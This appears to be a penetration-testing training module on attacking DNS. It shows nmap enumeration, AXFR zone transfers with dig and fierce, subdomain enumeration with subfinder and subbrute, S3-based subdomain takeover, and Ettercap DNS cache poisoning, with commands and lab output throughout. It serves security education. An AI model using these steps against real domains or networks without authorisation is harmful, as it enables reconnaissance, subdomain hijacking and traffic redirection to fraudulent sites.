Attacking DNS
The Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to the numerical IP addresses (e.g., 104.17.42.72). DNS is mostly UDP/53, but DNS will rely on TCP/53 more heavily as time progresses. DNS has always been designed to use both UDP and TCP port 53 from the start, with UDP being the default, and falls back to using TCP when it cannot communicate on UDP, typically when the packet size is too large to push through in a single UDP packet. Since nearly all network applications use DNS, attacks against DNS servers represent one of the most prevalent and significant threats today.
Enumeration
DNS holds interesting information for an organization. As discussed in the Domain Information section in the Footprinting module, we can understand how a company operates and the services they provide, as well as third-party service providers like emails.
The Nmap -sC (default scripts) and -sV (version scan) options can be used to perform initial enumeration against the target DNS servers:
nmap -p53 -Pn -sV -sC 10.10.110.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 03:47 EDT
Nmap scan report for 10.10.110.213
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
DNS Zone Transfer
A DNS zone is a portion of the DNS namespace that a specific organization or administrator manages. Since DNS comprises multiple DNS zones, DNS servers utilize DNS zone transfers to copy a portion of their database to another DNS server. Unless a DNS server is configured correctly (limiting which IPs can perform a DNS zone transfer), anyone can ask a DNS server for a copy of its zone information since DNS zone transfers do not require any authentication. In addition, the DNS service usually runs on a UDP port; however, when performing DNS zone transfer, it uses a TCP port for reliable data transmission.
An attacker could leverage this DNS zone transfer vulnerability to learn more about the target organization’s DNS namespace, increasing the attack surface.
DIG - AXFR Zone Transfer
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb. 604800 IN AAAA ::1
inlanefrieght.htb. 604800 IN NS localhost.
inlanefrieght.htb. 604800 IN A 10.129.110.22
admin.inlanefrieght.htb. 604800 IN A 10.129.110.21
hr.inlanefrieght.htb. 604800 IN A 10.129.110.25
support.inlanefrieght.htb. 604800 IN A 10.129.110.28
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)
Fierce
Tools like Fierce can also be used to enumerate all DNS servers of the root domain and scan for a DNS zone transfer:
fierce --domain zonetransfer.me
NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
'172800 900 1209600 3600\n'
'@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
'@ 301 IN TXT '
'"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
'@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
...SNIP...
Domain Takeovers & Subdomain Enumeration
Domain takeover is registering a non-existent domain name to gain control over another domain. If attackers find an expired domain, they can claim that domain to perform further attacks such as hosting malicious content on a website or sending a phishing email leveraging the claimed domain.
Subdomain Takeover
A DNS’s canonical name (CNAME) record is used to map different domains to a parent domain. Many organizations use third-party services like AWS, GitHub, Akamai, Fastly, and other content delivery networks (CDNs) to host their content. In this case, they usually create a subdomain and make it point to those services.
sub.target.com. 60 IN CNAME anotherdomain.com
If anotherdomain.com expires and is available for anyone to claim, anyone who registers it will have complete control over sub.target.com until the DNS record is updated.
Subdomain Enumeration with Subfinder
./subfinder -d inlanefreight.com -v
_ __ _ _
____ _| |__ / _(_)_ _ __| |___ _ _
(_-< || | '_ \ _| | ' \/ _ / -_) '_|
/__/\_,_|_.__/_| |_|_||_\__,_\___|_| v2.4.5
projectdiscovery.io
[INF] Enumerating subdomains for inlanefreight.com
[alienvault] www.inlanefreight.com
[dnsdumpster] ns1.inlanefreight.com
[dnsdumpster] ns2.inlanefreight.com
...snip...
ns2.inlanefreight.com
www.inlanefreight.com
ns1.inlanefreight.com
support.inlanefreight.com
[INF] Found 4 subdomains for inlanefreight.com in 20 seconds 11 milliseconds
Subbrute (Internal Penetration Tests)
Subbrute allows using self-defined resolvers and performing pure DNS brute-forcing attacks during internal penetration tests on hosts that do not have Internet access.
git clone https://github.com/TheRook/subbrute.git >> /dev/null 2>&1
cd subbrute
echo "ns1.inlanefreight.com" > ./resolvers.txt
./subbrute.py inlanefreight.com -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.com
ns2.inlanefreight.com
www.inlanefreight.com
ms1.inlanefreight.com
support.inlanefreight.com
Checking for Subdomain Takeover
Using nslookup or host command, enumerate the CNAME records for subdomains:
host support.inlanefreight.com
support.inlanefreight.com is an alias for inlanefreight.s3.amazonaws.com
If the URL shows a NoSuchBucket error, the subdomain is potentially vulnerable to takeover. You can claim it by creating an AWS S3 bucket with the same subdomain name.
Reference: can-i-take-over-xyz - Shows whether target services are vulnerable to subdomain takeover.
DNS Spoofing (DNS Cache Poisoning)
DNS spoofing involves altering legitimate DNS records with false information so that they can be used to redirect online traffic to a fraudulent website.
Attack Paths
- Man-in-the-Middle (MITM) - Intercept communication between a user and a DNS server to route the user to a fraudulent destination
- DNS Server Exploitation - Exploit a vulnerability in a DNS server to modify DNS records
Local DNS Cache Poisoning with Ettercap
From a local network perspective, an attacker can perform DNS Cache Poisoning using MITM tools like Ettercap or Bettercap.
Step 1: Edit /etc/ettercap/etter.dns to map the target domain:
inlanefreight.com A 192.168.225.110
*.inlanefreight.com A 192.168.225.110
Step 2: Start Ettercap and scan for live hosts:
- Navigate to
Hosts > Scan for Hosts - Add target IP (e.g., 192.168.152.129) to Target1
- Add default gateway IP (e.g., 192.168.152.2) to Target2
Step 3: Activate dns_spoof attack:
- Navigate to
Plugins > Manage Plugins - Select
dns_spoof
This sends the target machine fake DNS responses that resolve inlanefreight.com to the attacker’s IP address.
Verification:
C:\>ping inlanefreight.com
Pinging inlanefreight.com [192.168.225.110] with 32 bytes of data:
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.225.110:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Tools Summary
| Tool | Purpose |
|---|---|
nmap | DNS service enumeration |
dig | DNS queries and zone transfers (AXFR) |
fierce | DNS enumeration and zone transfer scanning |
subfinder | Subdomain enumeration from open sources |
subbrute | DNS brute-forcing with custom resolvers |
host / nslookup | CNAME record enumeration |
ettercap / bettercap | Local DNS cache poisoning via MITM |
Key Takeaways
- DNS zone transfers (AXFR) can expose the entire DNS namespace if not properly restricted
- Subdomain takeover is possible when CNAME records point to expired/unclaimed third-party services
- DNS cache poisoning can redirect users to malicious sites via MITM attacks
- Always check for misconfigured DNS servers during reconnaissance